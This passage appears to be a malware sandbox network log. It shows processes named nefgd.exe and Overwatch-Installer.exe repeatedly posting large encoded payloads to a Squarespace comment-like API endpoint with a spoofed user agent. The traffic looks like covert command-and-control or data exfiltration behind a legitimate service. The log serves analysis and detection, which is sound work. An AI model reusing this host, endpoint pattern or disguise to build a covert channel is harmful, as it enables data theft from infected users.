52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:56 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:56 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:56 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:56 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:56 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:56 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:56 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:56 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTgxmgP5Y99mOGNhY2I3N2RlOWFiODc3MTNlMmM0NThhYWVkYjMz; Path=/; Secure Set-Cookie: crumb=BfOU1sT6XnjcNjNjMWFkNGI3ZjIyMTk2YTAxYmMzMmZiMzMyZDhk; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 8sKy9WGe/2JBAnUBq Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BfOU1sT6XnjcNjNjMWFkNGI3ZjIyMTk2YTAxYmMzMmZiMzMyZDhk"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	49833	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:56 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:56 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:56 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:56 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:56 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:56 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcLdEf8Iqs8tNmE2MWMxOWUzZWVmYWRjZjY4MmMzNjY4MjgzNzAx; Path=/; Secure Set-Cookie: crumb=BRbagLqJRtkpZDRiOTI1MTEzNGYyOTkxMWIwYjUyY2U0NTVhYTU4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: MyszhEYu/WnYWkJVI Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRbagLqJRtkpZDRiOTI1MTEzNGYyOTkxMWIwYjUyY2U0NTVhYTU4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	49837	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:56 UTC	296	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108468 Expect: 100-continue
2024-09-01 20:04:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 3d 74 51 73 50 33 36 39 66 25 32 42 69 79 58 52 5a 72 43 6b 38 55 6b 4b 76 6b 6c 2f 75 59 59 65 44 6f 4a 4c 73 65 7a 4d 53 2f 6d 6d 48 6a 55 42 71 7a 61 5a 58 52 6e 36 44 71 52 78 6d 7a 64 56 44 50 47 64 79 2f 70 37 79 71 69 6a 4a 30 4c 44 73 4d 5a 5a 52 53 34 6e 33 71 41 6b 6b 36 39 32 48 69 39 44 44 5a 57 36 65 74 44 43 6d 53 50 72 55 77 75 41 54 33 43 55 77 67 56 79 73 79 67 43 2f 6a 6d 65 39 33 39 75 54 46 51 41 6d 6e 51 4d 72 6b 4c 70 74 31 57 4f 46 6a 76 67 38 73 52 45 52 78 35 42 42 35 66 56 75 41 49 56 64 61 65 4b 31 6b 75 64 6f 54 4a 54 65 49 6d 44 39 58 6e 50 6f 39 72 6e 6b 6d 44 48 56 4b 52 46 6d 25 32 42 4c 61 39 6a 78 34 4a 69 58 36 7a 57 77 38 50 32 37 48 48 34 47 41 6c 53 59 69 78 53 48 2f 7a 41 7a 53 78 32 5a 71 6e 50 6f 62 6d 37 4d 54 4c Data Ascii: =tQsP369f%2BiyXRZrCk8UkKvkl/uYYeDoJLsezMS/mmHjUBqzaZXRn6DqRxmzdVDPGdy/p7yqijJ0LDsMZZRS4n3qAkk692Hi9DDZW6etDCmSPrUwuAT3CUwgVysygC/jme939uTFQAmnQMrkLpt1WOFjvg8sRERx5BB5fVuAIVdaeK1kudoTJTeImD9XnPo9rnkmDHVKRFm%2BLa9jx4JiX6zWw8P27HH4GAlSYixSH/zAzSx2ZqnPobm7MTL
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 35 Data Ascii: 5
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 25 32 42 66 64 49 73 63 65 6d 35 44 74 6c 56 6c 78 55 4c 67 55 50 75 69 76 66 45 4d 76 75 56 4b 76 79 75 30 70 25 32 42 25 32 42 41 74 48 31 6f 39 67 25 32 42 79 79 4f 62 37 61 63 46 4a 68 30 54 62 47 63 51 74 71 56 4b 53 51 68 78 66 48 66 61 42 34 45 6a 4e 79 57 32 67 56 51 65 6c 54 6e 34 45 56 6b 32 66 4b 59 46 48 2f 65 65 6e 68 58 4e 43 7a 54 44 74 61 41 66 72 33 78 52 64 54 74 4c 67 34 68 6b 68 61 35 6f 5a 45 59 77 4b 53 4d 43 53 66 4b 4a 34 41 32 64 73 42 35 49 33 7a 4e 32 75 79 76 37 39 46 32 56 42 43 37 57 63 47 62 31 36 41 71 44 32 61 30 54 75 2f 6f 6a 6f 6b 71 4f 38 45 42 64 74 36 72 43 30 4d 4c 25 32 42 4c 4b 53 57 5a 71 53 37 31 7a 4a 32 65 52 77 42 71 42 75 6e 79 65 59 4a 67 51 36 67 76 76 70 6c 63 6c 6c 47 33 32 31 58 6c 5a 25 32 42 43 4d 53 Data Ascii: %2BfdIscem5DtlVlxULgUPuivfEMvuVKvyu0p%2B%2BAtH1o9g%2ByyOb7acFJh0TbGcQtqVKSQhxfHfaB4EjNyW2gVQelTn4EVk2fKYFH/eenhXNCzTDtaAfr3xRdTtLg4hkha5oZEYwKSMCSfKJ4A2dsB5I3zN2uyv79F2VBC7WcGb16AqD2a0Tu/ojokqO8EBdt6rC0ML%2BLKSWZqS71zJ2eRwBqBunyeYJgQ6gvvplcllG321XlZ%2BCMS
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 37 Data Ascii: 7
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 48 78 56 72 76 37 70 74 55 6b 33 34 68 35 72 71 6e 42 72 6c 65 78 38 56 61 37 25 32 42 36 62 4e 59 46 73 71 62 73 63 72 64 6f 78 33 30 6d 7a 42 61 34 63 45 4f 46 67 4d 71 4b 55 34 4b 71 76 69 57 53 44 7a 35 36 30 71 50 33 4a 54 66 72 53 67 72 53 65 37 6c 31 6e 61 39 63 4d 45 39 47 67 30 48 34 6f 34 54 31 67 4f 31 25 32 42 54 4e 54 75 25 32 42 76 5a 39 70 25 32 42 67 52 75 47 53 70 53 52 5a 46 59 45 71 6b 73 6f 4e 65 62 46 64 62 4d 73 35 57 50 30 6a 4d 69 64 54 32 72 32 4f 62 2f 50 59 72 73 4c 36 6f 4e 7a 4f 6f 61 75 61 6d 37 41 4d 34 65 49 6c 66 47 61 64 46 69 64 78 4a 70 32 78 4c 4b 42 41 66 4f 41 79 69 67 49 70 62 68 7a 4e 54 44 4a 5a 49 67 7a 36 48 44 56 69 5a 52 77 4b 76 48 32 30 71 46 4f 46 68 35 55 37 6b 25 32 42 56 34 36 45 75 53 6a 4d 74 73 53 72 Data Ascii: HxVrv7ptUk34h5rqnBrlex8Va7%2B6bNYFsqbscrdox30mzBa4cEOFgMqKU4KqviWSDz560qP3JTfrSgrSe7l1na9cME9Gg0H4o4T1gO1%2BTNTu%2BvZ9p%2BgRuGSpSRZFYEqksoNebFdbMs5WP0jMidT2r2Ob/PYrsL6oNzOoauam7AM4eIlfGadFidxJp2xLKBAfOAyigIpbhzNTDJZIgz6HDViZRwKvH20qFOFh5U7k%2BV46EuSjMtsSr
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 4d Data Ascii: M
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 4f 47 38 56 72 54 38 79 44 6b 77 4e 42 59 31 61 34 56 64 4a 65 43 5a 77 32 32 6e 25 32 42 53 4a 74 72 6c 47 72 72 6e 74 53 66 34 6d 4e 4f 55 41 36 65 47 53 38 69 33 6c 49 4c 76 4f 32 6a 38 4a 62 69 69 4e 6b 48 64 4f 6d 79 44 59 43 43 33 6b 6a 71 48 32 57 31 65 6a 57 25 32 42 55 33 50 64 49 77 65 51 6f 64 69 70 44 7a 38 50 59 36 49 47 37 39 4f 69 4b 75 73 51 6b 39 34 6a 5a 74 32 51 6c 79 45 31 33 34 43 71 38 4f 75 47 63 6b 56 47 49 34 78 53 72 39 56 79 6c 53 48 74 34 31 68 64 33 58 6e 61 65 65 4b 38 54 4b 53 77 6e 73 35 6e 50 67 74 38 5a 47 59 38 32 36 68 5a 4a 35 68 49 32 4b 6c 38 66 4f 42 64 7a 31 34 34 77 47 63 69 46 25 32 42 63 46 78 64 39 2f 48 72 55 70 44 49 77 63 2f 61 41 41 6a 56 47 62 38 6e 4b 49 5a 56 77 42 43 31 33 53 46 37 6c 50 74 65 66 45 37 Data Ascii: OG8VrT8yDkwNBY1a4VdJeCZw22n%2BSJtrlGrrntSf4mNOUA6eGS8i3lILvO2j8JbiiNkHdOmyDYCC3kjqH2W1ejW%2BU3PdIweQodipDz8PY6IG79OiKusQk94jZt2QlyE134Cq8OuGckVGI4xSr9VylSHt41hd3XnaeeK8TKSwns5nPgt8ZGY826hZJ5hI2Kl8fOBdz144wGciF%2BcFxd9/HrUpDIwc/aAAjVGb8nKIZVwBC13SF7lPtefE7
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 36 Data Ascii: 6
2024-09-01 20:04:57 UTC	16306	OUT	Data Raw: 5a 77 47 6b 58 50 77 50 25 32 42 50 70 65 44 34 31 56 74 55 43 39 66 72 6b 2f 48 43 75 54 64 37 4c 39 6f 34 2f 38 73 4b 44 73 59 58 32 59 53 49 77 78 67 57 6c 37 4b 61 70 45 50 4b 4f 6b 4d 4e 57 31 72 79 62 4e 69 4f 62 4e 75 70 72 66 36 25 32 42 65 48 4e 54 4e 32 4e 30 57 61 76 4e 79 48 59 47 68 70 43 33 25 32 42 70 78 50 2f 73 7a 61 64 78 64 66 36 58 4e 47 37 62 44 36 68 35 66 70 6d 63 4c 65 73 4f 6d 63 38 69 6e 6b 53 69 55 71 70 53 47 4a 70 55 36 76 35 77 74 36 45 63 39 75 33 63 7a 63 6a 56 69 34 71 76 71 35 2f 52 72 54 48 57 79 35 31 50 47 53 53 72 46 6f 72 76 41 25 32 42 70 68 49 57 76 41 74 66 6f 39 68 4d 36 6b 49 6a 57 4d 77 70 50 54 6b 54 47 6a 67 4c 47 4c 35 67 2f 61 59 39 4c 4c 6a 35 59 42 71 61 45 56 73 77 63 4e 65 33 48 30 75 64 32 72 57 65 44 Data Ascii: ZwGkXPwP%2BPpeD41VtUC9frk/HCuTd7L9o4/8sKDsYX2YSIwxgWl7KapEPKOkMNW1rybNiObNuprf6%2BeHNTN2N0WavNyHYGhpC3%2BpxP/szadxdf6XNG7bD6h5fpmcLesOmc8inkSiUqpSGJpU6v5wt6Ec9u3czcjVi4qvq5/RrTHWy51PGSSrForvA%2BphIWvAtfo9hM6kIjWMwpPTkTGjgLGL5g/aY9LLj5YBqaEVswcNe3H0ud2rWeD
2024-09-01 20:04:57 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:56 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbbSIkz-I6XRYmE2MzFiM2Q1NGQwYjRhYjNmMjc4Y2ZiYWUwYTYx; Path=/; Secure Set-Cookie: crumb=BYlQFpUPUBjqMzQ1NmIxMWU2MTI2YjRiMDBhZTRmNDc3NTk2ODNh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: ukJiRmbA/cq4v0n2r Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BYlQFpUPUBjqMzQ1NmIxMWU2MTI2YjRiMDBhZTRmNDc3NTk2ODNh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	49838	198.185.159.177	443	5952	C:\Users\user\AppData\Roaming\nefgd\nefgd.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:56 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:57 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:57 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:57 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BS5IjRXV3AboNjIzZjNmODI0MDI5NjJlNTM0YTI5NGI3Y2U1NDU3; Path=/; Secure Set-Cookie: crumb=BQjBIRgIHJJlZWIyNzVhODY0ODFhZDQ5MWUzYzQ2MDZiZWViMjRj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 1mfSr3ix/Zz4ZxNnn Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQjBIRgIHJJlZWIyNzVhODY0ODFhZDQ5MWUzYzQ2MDZiZWViMjRj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	49839	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:57 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:57 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:57 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:57 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BejbudBigqEbYWQzYjY0MzlkYzQwODVkYzIwMGMxYTkyMTBlMzZm; Path=/; Secure Set-Cookie: crumb=BQGYjJGKRRK1YzVlMTFiZjY3MzAwNzQ0MDMyNjdjMGM3OGY0MDU5; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: UDIACYC7/jVXIwR9N Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQGYjJGKRRK1YzVlMTFiZjY3MzAwNzQ0MDMyNjdjMGM3OGY0MDU5"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	49840	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:57 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:57 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:57 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:57 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
